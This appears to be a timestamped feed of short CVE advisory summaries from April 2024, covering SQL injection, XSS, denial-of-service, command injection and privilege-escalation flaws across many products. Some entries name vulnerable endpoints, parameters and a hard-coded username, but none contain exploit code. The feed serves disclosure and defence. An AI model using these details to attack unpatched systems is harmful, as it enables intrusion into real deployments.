🚨 CVE-2024-29741In pblS2mpuResume of s2mpu.c, there is a possible mitigation bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-04-05 20:37:25 |
🚨 CVE-2024-27232In asn1_ec_pkey_parse of asn1_common.c, there is a possible OOB read due to a missing null check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-04-05 20:37:24 |
🚨 CVE-2024-27231In tmu_get_tr_stats of tmu.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-04-05 19:37:24 |
🚨 CVE-2024-0081NVIDIA NeMo framework for Ubuntu contains a vulnerability in tools/asr_webapp where an attacker may cause an allocation of resources without limits or throttling. A successful exploit of this vulnerability may lead to a server-side denial of service.🎖@cveNotify |
|
| 2024-04-05 18:37:30 |
🚨 CVE-2024-28065In Unify CP IP Phone firmware 1.10.4.3, files are not encrypted and contain sensitive information such as the root password hash.🎖@cveNotify |
|
| 2024-04-05 18:37:26 |
🚨 CVE-2024-0080NVIDIA nvTIFF Library for Windows and Linux contains a vulnerability where improper input validation might enable an attacker to use a specially crafted input file. A successful exploit of this vulnerability might lead to a partial denial of service.🎖@cveNotify |
|
| 2024-04-05 18:37:25 |
🚨 CVE-2024-0072NVIDIA CUDA toolkit for all platforms contains a vulnerability in cuobjdump and nvdisasm where an attacker may cause a crash by tricking a user into reading a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.🎖@cveNotify |
|
| 2024-04-05 18:37:24 |
🚨 CVE-2023-31028NVIDIA nvJPEG2000 Library for Windows and Linux contains a vulnerability where improper input validation might enable an attacker to use a specially crafted input file. A successful exploit of this vulnerability might lead to a partial denial of service.🎖@cveNotify |
|
| 2024-04-05 17:37:26 |
🚨 CVE-2024-3349A vulnerability classified as critical was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/login.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259453 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-05 17:37:25 |
🚨 CVE-2023-49232An authentication bypass vulnerability was found in Stilog Visual Planning 8. It allows an unauthenticated attacker to brute-force the password reset PINs of administrative users.🎖@cveNotify |
|
| 2024-04-05 17:37:24 |
🚨 CVE-2023-49231An authentication bypass vulnerability was found in Stilog Visual Planning 8. It allows an unauthenticated attacker to receive an administrative API token.🎖@cveNotify |
|
| 2024-04-05 16:37:28 |
🚨 CVE-2024-3347A vulnerability was found in SourceCodester Airline Ticket Reservation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file activate_jet_details_form_handler.php. The manipulation of the argument jet_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259451.🎖@cveNotify |
|
| 2024-04-05 16:37:27 |
🚨 CVE-2023-48426u-boot bug that allows for u-boot shell and interrupt over UART🎖@cveNotify |
|
| 2024-04-05 15:37:25 |
🚨 CVE-2024-31218Webhood is a self-hosted URL scanner used analyzing phishing and malicious sites. Webhood's backend container images in versions 0.9.0 and earlier are subject to Missing Authentication for Critical Function vulnerability. This vulnerability allows an unauthenticated attacker to send a HTTP request to the database (Pocketbase) admin API to create an admin account. The Pocketbase admin API does not check for authentication/authorization when creating an admin account when no admin accounts have been added. In its default deployment, Webhood does not create a database admin account. Therefore, unless users have manually created an admin account in the database, an admin account will not exist in the deployment and the deployment is vulnerable. Versions starting from 0.9.1 are patched. The patch creates a randomly generated admin account if admin accounts have not already been created i.e. the vulnerability is exploitable in the deployment. As a workaround, users can disable access to URL path starting with `/api/admins` entirely. With this workaround, the vulnerability is not exploitable via network.🎖@cveNotify |
|
| 2024-04-05 15:37:24 |
🚨 CVE-2024-31213InstantCMS is a free and open source content management system. An open redirect was found in the ICMS2 application version 2.16.2 when being redirected after modifying one's own user profile. An attacker could trick a victim into visiting their web application, thinking they are still present on the ICMS2 application. They could then host a website stating "To update your profile, please enter your password," upon which the user may type their password and send it to the attacker. As of time of publication, a patched version is not available.🎖@cveNotify |
|
| 2024-04-05 14:37:25 |
🚨 CVE-2024-31390Improper Control of Generation of Code ('Code Injection') vulnerability in Soflyy Breakdance allows Code Injection.This issue affects Breakdance: from n/a through 1.7.0.🎖@cveNotify |
|
| 2024-04-05 14:37:24 |
🚨 CVE-2024-31380Improper Control of Generation of Code ('Code Injection') vulnerability in Soflyy Oxygen Builder allows Code Injection.This issue affects Oxygen Builder: from n/a through 4.8.2.🎖@cveNotify |
|
| 2024-04-05 13:37:24 |
🚨 CVE-2023-5692WordPress Core is vulnerable to Sensitive Information Exposure in versions up to, and including, 6.4.3 via the redirect_guess_404_permalink function. This can allow unauthenticated attackers to expose the slug of a custom post whose 'publicly_queryable' post status has been set to 'false'.🎖@cveNotify |
|
| 2024-04-05 13:07:51 |
🚨 CVE-2024-27316HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.🎖@cveNotify |
|
| 2024-04-05 13:07:44 |
🚨 CVE-2024-22053A heap overflow vulnerability in IPSec component of Ivanti Connect Secure (9.x 22.x) and Ivanti Policy Secure allows an unauthenticated malicious user to send specially crafted requests in-order-to crash the service thereby causing a DoS attack or in certain conditions read contents from memory.🎖@cveNotify |
|
| 2024-04-05 13:07:43 |
🚨 CVE-2023-38709Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.This issue affects Apache HTTP Server: through 2.4.58.🎖@cveNotify |
|
| 2024-04-05 12:37:25 |
🚨 CVE-2023-6523Authorization Bypass Through User-Controlled Key vulnerability in ExtremePacs Extreme XDS allows Authentication Abuse.This issue affects Extreme XDS: before 3914.🎖@cveNotify |
|
| 2024-04-05 12:37:24 |
🚨 CVE-2024-3296A timing-based side-channel flaw exists in the rust-openssl package, which could be sufficient to recover a plaintext across a network in a Bleichenbacher-style attack. To achieve successful decryption, an attacker would have to be able to send a large number of trial messages for decryption. The vulnerability affects the legacy PKCS#1v1.5 RSA encryption padding mode.🎖@cveNotify |
|
| 2024-04-05 09:37:37 |
🚨 CVE-2024-21848Improper Access Control in Mattermost Server versions 8.1.x before 8.1.11 allows an attacker that is in a channel with an active call to keep participating in the call even if they are removed from the channel🎖@cveNotify |
|
| 2024-04-05 09:37:31 |
🚨 CVE-2023-43490Incorrect calculation in microcode keying mechanism for some Intel(R) Xeon(R) D Processors with Intel(R) SGX may allow a privileged user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2024-04-05 09:37:30 |
🚨 CVE-2023-32666On-chip debug and test interface with improper access control in some 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-04-05 09:37:26 |
🚨 CVE-2023-22655Protection mechanism failure in some 3rd and 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-04-05 09:37:25 |
🚨 CVE-2023-30996IBM Cognos Analytics 11.1.7, 11.2.4, and 12.0.0 could be vulnerable to information leakage due to unverified sources in messages sent between Windows objects of different origins. IBM X-Force ID: 254290.🎖@cveNotify |
|
| 2024-04-05 09:37:24 |
🚨 CVE-2022-34357IBM Cognos Analytics Mobile Server 11.1.7, 11.2.4, and 12.0.0 is vulnerable to Denial of Service due to due to weak or absence of rate limiting. By making unlimited http requests, it is possible for a single user to exhaust server resources over a period of time making service unavailable for other legitimate users. IBM X-Force ID: 230510.🎖@cveNotify |
|
| 2024-04-05 08:37:25 |
🚨 CVE-2024-30849Arbitrary file upload vulnerability in Sourcecodester Complete E-Commerce Site v1.0, allows remote attackers to execute arbitrary code via filename parameter in admin/products_photo.php.🎖@cveNotify |
|
| 2024-04-05 08:37:24 |
🚨 CVE-2024-2115The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.0.0. This is due to missing or incorrect nonce validation on the filter_users functions. This makes it possible for unauthenticated attackers to elevate their privileges to that of a teacher via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-04-05 07:37:24 |
🚨 CVE-2024-26329Chilkat before v9.5.0.98, allows attackers to obtain sensitive information via predictable PRNG in ChilkatRand::randomBytes function.🎖@cveNotify |
|
| 2024-04-05 06:37:25 |
🚨 CVE-2024-22363SheetJS Community Edition before 0.20.2 is vulnerable.to Regular Expression Denial of Service (ReDoS).🎖@cveNotify |
|
| 2024-04-05 06:37:24 |
🚨 CVE-2023-52235SpaceX Starlink Wi-Fi router GEN 2 before 2023.53.0 and Starlink Dish before 07dd2798-ff15-4722-a9ee-de28928aed34 allow CSRF (e.g., for a reboot) via a DNS Rebinding attack.🎖@cveNotify |
|
| 2024-04-05 05:37:25 |
🚨 CVE-2024-3273** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-05 05:37:24 |
🚨 CVE-2024-3272** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-05 03:37:24 |
🚨 CVE-2023-5973Brocade Web Interface in Brocade Fabric OS v9.x and before v9.2.0 does not properly represent the portName to the user if the portName contains reserved characters. This could allow an authenticated user to alter the UI of the Brocade Switch and change ports display.🎖@cveNotify |
|
| 2024-04-05 01:37:24 |
🚨 CVE-2024-3321A vulnerability classified as problematic has been found in SourceCodester eLearning System 1.0. This affects an unknown part of the component Maintenance Module. The manipulation of the argument Subject Code/Description leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259389 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-05 00:37:28 |
🚨 CVE-2024-3320A vulnerability was found in SourceCodester eLearning System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument page leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-259388.🎖@cveNotify |
|
| 2024-04-04 23:37:32 |
🚨 CVE-2024-31212InstantCMS is a free and open source content management system. A SQL injection vulnerability affects instantcms v2.16.2 in which an attacker with administrative privileges can cause the application to execute unauthorized SQL code. The vulnerability exists in index_chart_data action, which receives an input from user and passes it unsanitized to the core model `filterFunc` function that further embeds this data in an SQL statement. This allows attackers to inject unwanted SQL code into the statement. The `period` should be escaped before inserting it in the query. As of time of publication, a patched version is not available.🎖@cveNotify |
|
| 2024-04-04 23:37:26 |
🚨 CVE-2024-31211WordPress is an open publishing platform for the Web. Unserialization of instances of the `WP_HTML_Token` class allows for code execution via its `__destruct()` magic method. This issue was fixed in WordPress 6.4.2 on December 6th, 2023. Versions prior to 6.4.0 are not affected.🎖@cveNotify |
|
| 2024-04-04 23:37:25 |
🚨 CVE-2024-27981A Command Injection vulnerability found in a Self-Hosted UniFi Network Servers (Linux) with UniFi Network Application (Version 8.0.28 and earlier) allows a malicious actor with UniFi Network Application Administrator credentials to escalate privileges to root on the host device.Affected Products:UniFi Network Application (Version 8.0.28 and earlier) . Mitigation:Update UniFi Network Application to Version 8.1.113 or later.🎖@cveNotify |
|
| 2024-04-04 23:37:24 |
🚨 CVE-2024-21894A heap overflow vulnerability in IPSec component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated malicious user to send specially crafted requests in-order-to crash the service thereby causing a DoS attack. In certain conditions this may lead to execution of arbitrary code🎖@cveNotify |
|
| 2024-04-04 22:37:25 |
🚨 CVE-2024-29049Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability🎖@cveNotify |
|
| 2024-04-04 22:37:24 |
🚨 CVE-2024-29059.NET Framework Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-04-04 21:37:34 |
🚨 CVE-2024-3314A vulnerability was found in SourceCodester Computer Laboratory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Users.php. The manipulation leads to sql injection. The attack may be initiated remotely. The identifier VDB-259385 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-04 21:37:28 |
🚨 CVE-2024-3311A vulnerability was found in Dreamer CMS up to 4.1.3.0. It has been declared as critical. Affected by this vulnerability is the function ZipUtils.unZipFiles of the file controller/admin/ThemesController.java. The manipulation leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.3.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-259369 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-04 21:37:27 |
🚨 CVE-2023-45288An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.🎖@cveNotify |
|
| 2024-04-04 20:37:34 |
🚨 CVE-2024-27316HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.🎖@cveNotify |
|
| 2024-04-04 20:37:27 |
🚨 CVE-2024-22052A null pointer dereference vulnerability in IPSec component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows an unauthenticated malicious user to send specially crafted requests in-order-to crash the service thereby causing a DoS attack🎖@cveNotify |
|
| 2024-04-04 20:37:26 |
🚨 CVE-2023-38709Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.This issue affects Apache HTTP Server: through 2.4.58.🎖@cveNotify |
|
| 2024-04-04 19:37:26 |
🚨 CVE-2024-30263macro-pdfviewer is a PDF Viewer Macro for XWiki using Mozilla pdf.js. Users with edit rights can access restricted PDF attachments using the PDF Viewer macro, just by passing the attachment URL as the value of the ``file`` parameter. Users with view rights can access restricted PDF attachments if they are shown on public pages where the PDF Viewer macro is called using the attachment URL instead of its reference. This vulnerability has been patched in version 2.5.1.🎖@cveNotify |
|
| 2024-04-04 19:37:25 |
🚨 CVE-2023-3454Remote code execution (RCE) vulnerability in Brocade Fabric OS after v9.0 and before v9.2.0 could allow an attacker to execute arbitrary code and use this to gain root access to the Brocade switch.🎖@cveNotify |
|
| 2024-04-04 18:37:25 |
🚨 CVE-2024-25690There is an HTML injection vulnerability in Esri Portal for ArcGIS versions 11.1 and below that may allow a remote, unauthenticated attacker to create a crafted link which when clicked could render arbitrary HTML in the victim’s browser.🎖@cveNotify |
|
| 2024-04-04 18:37:24 |
🚨 CVE-2024-1635A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. At HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.🎖@cveNotify |
|
| 2024-04-04 17:37:26 |
🚨 CVE-2024-30263macro-pdfviewer is a PDF Viewer Macro for XWiki using Mozilla pdf.js. Users with edit rights can access restricted PDF attachments using the PDF Viewer macro, just by passing the attachment URL as the value of the ``file`` parameter. Users with view rights can access restricted PDF attachments if they are shown on public pages where the PDF Viewer macro is called using the attachment URL instead of its reference. This vulnerability has been patched in version 2.5.1.🎖@cveNotify |
|
| 2024-04-04 17:37:25 |
🚨 CVE-2023-40548A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.🎖@cveNotify |
|
| 2024-04-04 17:37:24 |
🚨 CVE-2022-3671A vulnerability classified as critical was found in SourceCodester eLearning System 1.0. This vulnerability affects unknown code of the file /admin/students/manage.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212014 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-04 16:37:42 |
🚨 CVE-2024-30250Astro-Shield is an integration to enhance website security with SubResource Integrity hashes, Content-Security-Policy headers, and other techniques. Versions from 1.2.0 to 1.3.1 of Astro-Shield allow bypass to the allow-lists for cross-origin resources by introducing valid `integrity` attributes to the injected code. This implies that the injected SRI hash would be added to the generated CSP header, which would lead the browser to believe that the injected resource is legit. This vulnerability is patched in version 1.3.2.🎖@cveNotify |
|
| 2024-04-04 16:37:41 |
🚨 CVE-2024-29191gotortc is a camera streaming application. Versions 1.8.5 and prior are vulnerable to DOM-based cross-site scripting. The links page (`links.html`) appends the `src` GET parameter (`[0]`) in all of its links for 1-click previews. The context in which `src` is being appended is `innerHTML` (`[1]`), which will insert the text as HTML. Commit 3b3d5b033aac3a019af64f83dec84f70ed2c8aba contains a patch for the issue.🎖@cveNotify |
|
| 2024-04-04 16:37:37 |
🚨 CVE-2024-28871LibHTP is a security-aware parser for the HTTP protocol and the related bits and pieces. Version 0.5.46 may parse malformed request traffic, leading to excessive CPU usage. Version 0.5.47 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-04 16:37:36 |
🚨 CVE-2024-27919Envoy is a cloud-native, open-source edge and service proxy. In versions 1.29.0 and 1.29.1, theEnvoy HTTP/2 protocol stack is vulnerable to the flood of CONTINUATION frames. Envoy's HTTP/2 codec does not reset a request when header map limits have been exceeded. This allows an attacker to send an sequence of CONTINUATION frames without the END_HEADERS bit set causing unlimited memory consumption. This can lead to denial of service through memory exhaustion. Users should upgrade to versions 1.29.2 to mitigate the effects of the CONTINUATION flood. Note that this vulnerability is a regression in Envoy version 1.29.0 and 1.29.1 only. As a workaround, downgrade to version 1.28.1 or earlier or disable HTTP/2 protocol for downstream connections.🎖@cveNotify |
|
| 2024-04-04 16:37:35 |
🚨 CVE-2024-22189quic-go is an implementation of the QUIC protocol in Go. Prior to version 0.42.0, an attacker can cause its peer to run out of memory sending a large number of `NEW_CONNECTION_ID` frames that retire old connection IDs. The receiver is supposed to respond to each retirement frame with a `RETIRE_CONNECTION_ID` frame. The attacker can prevent the receiver from sending out (the vast majority of) these `RETIRE_CONNECTION_ID` frames by collapsing the peers congestion window (by selectively acknowledging received packets) and by manipulating the peer's RTT estimate. Version 0.42.0 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-04 16:37:32 |
🚨 CVE-2024-3296A timing-based side-channel exists in the rust-openssl package, which could be sufficient to recover a plaintext across a network in a Bleichenbacher-style attack. To achieve successful decryption, an attacker would have to be able to send a large number of trial messages for decryption. The vulnerability affects the legacy PKCS#1v1.5 RSA encryption padding mode.🎖@cveNotify |
|
| 2024-04-04 16:37:31 |
🚨 CVE-2024-31081A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIPassiveGrabDevice() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.🎖@cveNotify |
|
| 2024-04-04 16:37:30 |
🚨 CVE-2024-2759Improper access control vulnerability in Apaczka plugin for PrestaShop allows information gathering from saved templates without authentication.This issue affects Apaczka plugin for PrestaShop from v1 through v4.🎖@cveNotify |
|
| 2024-04-04 16:37:26 |
🚨 CVE-2024-27575Directory Traversal vulnerability in INOTEC Sicherheitstechnik GmbH INOTEC Sicherheitstechnik GmbH WebServer CPS220/64 V.3.3.19 allows a remote attacker to execute arbitrary code via the /etc/passwd file.🎖@cveNotify |
|
| 2024-04-04 16:37:25 |
🚨 CVE-2024-1023A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.🎖@cveNotify |
|
| 2024-04-04 16:37:24 |
🚨 CVE-2023-4316Zod in versions 3.21.0 up to and including 3.22.3 allows an attacker to perform a denial of service while validating emails.🎖@cveNotify |
|
| 2024-04-04 15:37:31 |
🚨 CVE-2024-30261Undici is an HTTP/1.1 client, written from scratch for Node.js. An attacker can alter the `integrity` option passed to `fetch()`, allowing `fetch()` to accept requests as valid even if they have been tampered. This vulnerability was patched in version(s) 5.28.4 and 6.11.1.🎖@cveNotify |
|
| 2024-04-04 15:37:30 |
🚨 CVE-2024-30250Astro-Shield is an integration to enhance website security with SubResource Integrity hashes, Content-Security-Policy headers, and other techniques. Versions from 1.2.0 to 1.3.1 of Astro-Shield allow bypass to the allow-lists for cross-origin resources by introducing valid `integrity` attributes to the injected code. This implies that the injected SRI hash would be added to the generated CSP header, which would lead the browser to believe that the injected resource is legit. This vulnerability is patched in version 1.3.2.🎖@cveNotify |
|
| 2024-04-04 15:37:26 |
🚨 CVE-2024-28871LibHTP is a security-aware parser for the HTTP protocol and the related bits and pieces. Version 0.5.46 may parse malformed request traffic, leading to excessive CPU usage. Version 0.5.47 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-04 15:37:25 |
🚨 CVE-2024-22189quic-go is an implementation of the QUIC protocol in Go. Prior to version 0.42.0, an attacker can cause its peer to run out of memory sending a large number of `NEW_CONNECTION_ID` frames that retire old connection IDs. The receiver is supposed to respond to each retirement frame with a `RETIRE_CONNECTION_ID` frame. The attacker can prevent the receiver from sending out (the vast majority of) these `RETIRE_CONNECTION_ID` frames by collapsing the peers congestion window (by selectively acknowledging received packets) and by manipulating the peer's RTT estimate. Version 0.42.0 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-04-04 15:37:24 |
🚨 CVE-2024-1847Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in eDrawings from Release SOLIDWORKS 2023 through Release SOLIDWORKS 2024. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, IPT, JT, SAT, STL, STP, X_B or X_T file. NOTE: CVE-2024-3298 and CVE-2024-3299 were SPLIT from this ID.🎖@cveNotify |
|
| 2024-04-04 14:37:30 |
🚨 CVE-2023-52581In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: fix memleak when more than 255 elements expiredWhen more than 255 elements expired we're supposed to switch to a new gccontainer structure.This never happens: u8 type will wrap before reaching the boundaryand nft_trans_gc_space() always returns true.This means we recycle the initial gc container structure andlose track of the elements that came before.While at it, don't deref 'gc' after we've passed it to call_rcu.🎖@cveNotify |
|
| 2024-04-04 14:37:26 |
🚨 CVE-2023-52525In the Linux kernel, the following vulnerability has been resolved:wifi: mwifiex: Fix oob check condition in mwifiex_process_rx_packetOnly skip the code path trying to access the rfc1042 headers when thebuffer is too small, so the driver can still process packets withoutrfc1042 headers.🎖@cveNotify |
|
| 2024-04-04 14:37:25 |
🚨 CVE-2023-52433In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_set_rbtree: skip sync GC for new elements in this transactionNew elements in this transaction might expired before such transactionends. Skip sync GC for such elements otherwise commit path might walkover an already released object. Once transaction is finished, async GCwill collect such expired element.🎖@cveNotify |
|
| 2024-04-04 13:37:36 |
🚨 CVE-2024-3142A vulnerability was found in Clavister E10 and E80 up to 14.00.10 and classified as problematic. This issue affects some unknown processing of the component Setting Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 14.00.11 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-258917 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-04 13:37:35 |
🚨 CVE-2024-3141A vulnerability has been found in Clavister E10 and E80 up to 14.00.10 and classified as problematic. This vulnerability affects unknown code of the file /?Page=Node&OBJ=/System/AdvancedSettings/DeviceSettings/MiscSettings of the component Misc Settings Page. The manipulation of the argument WatchdogTimerTime/BufFloodRebootTime/MaxPipeUsers/AVCache Lifetime/HTTPipeliningMaxReq/Reassembly MaxConnections/Reassembly MaxProcessingMem/ScrSaveTime leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 14.00.11 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-258916.🎖@cveNotify |
|
| 2024-04-04 13:07:51 |
🚨 CVE-2024-3179Concrete CMS version 9 before 9.2.8 and previous versions before 8.5.16 are vulnerable to Stored XSS in the Custom Class page editing. Prior to the fix, a rogue administrator could insert malicious code in the custom class field due to insufficient validation of administrator provided data. The Concrete CMS security team gave this vulnerability a CVSS v3.1 score of 3.1 with a vector of AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Thanks Alexey Solovyev for reporting.🎖@cveNotify |
|
| 2024-04-04 13:07:44 |
🚨 CVE-2024-0335ABB has internally identified a vulnerability in the ABB VPNI feature of the S+ Control API component which may be used by several Symphony Plus products (e.g., S+ Operations, S+ Engineering and S+ Analyst)This issue affects Symphony Plus S+ Operations: from 3..0;0 through 3.3 SP1 RU4, from 2.1;0 through 2.1 SP2 RU3, from 2.0;0 through 2.0 SP6 TC6; Symphony Plus S+ Engineering: from 2.1 through 2.3 RU3; Symphony Plus S+ Analyst: from 7.0.0.0 through 7.2.0.2.🎖@cveNotify |
|
| 2024-04-04 13:07:43 |
🚨 CVE-2024-2653amphp/http will collect CONTINUATION frames in an unbounded buffer and will not check a limit until it has received the set END_HEADERS flag, resulting in an OOM crash.🎖@cveNotify |
|
| 2024-04-04 10:37:25 |
🚨 CVE-2024-26809In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_set_pipapo: release elements in clone only from destroy pathClone already always provides a current view of the lookup table, use itto destroy the set, otherwise it is possible to destroy elements twice.This fix requires: 212ed75dc5fb ("netfilter: nf_tables: integrate pipapo into commit protocol")which came after: 9827a0e6e23b ("netfilter: nft_set_pipapo: release elements in clone from abort path").🎖@cveNotify |
|
| 2024-04-04 10:37:24 |
🚨 CVE-2024-26808In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_chain_filter: handle NETDEV_UNREGISTER for inet/ingress basechainRemove netdevice from inet/ingress basechain in case NETDEV_UNREGISTERevent is reported, otherwise a stale reference to netdevice remains inthe hook list.🎖@cveNotify |
|
| 2024-04-04 09:37:25 |
🚨 CVE-2023-36644Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all order confirmations from the online shop via the printmail plugin.🎖@cveNotify |
|
| 2024-04-04 09:37:24 |
🚨 CVE-2023-36643Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all orders from the online shop via oordershow component in customer function.🎖@cveNotify |
|
| 2024-04-04 08:37:30 |
🚨 CVE-2024-30565An issue was discovered in SeaCMS version 12.9, allows remote attackers to execute arbitrary code via admin notify.php.🎖@cveNotify |
|
| 2024-04-04 08:37:29 |
🚨 CVE-2024-29008A problem has been identified in the CloudStack additional VM configuration (extraconfig) feature which can be misused by anyone who has privilege to deploy a VM instance or configure settings of an already deployed VM instance, to configure additional VM configuration even when the feature is not explicitly enabled by the administrator. In a KVM based CloudStack environment, an attacker can exploit this issue to attach host devices such as storage disks, and PCI and USB devices such as network adapters and GPUs, in a regular VM instance that can be further exploited to gain access to the underlying network and storage infrastructure resources, and access any VM instance disks on the local storage.Users are advised to upgrade to version 4.18.1.1 or 4.19.0.1, which fixes this issue.🎖@cveNotify |
|
| 2024-04-04 08:37:26 |
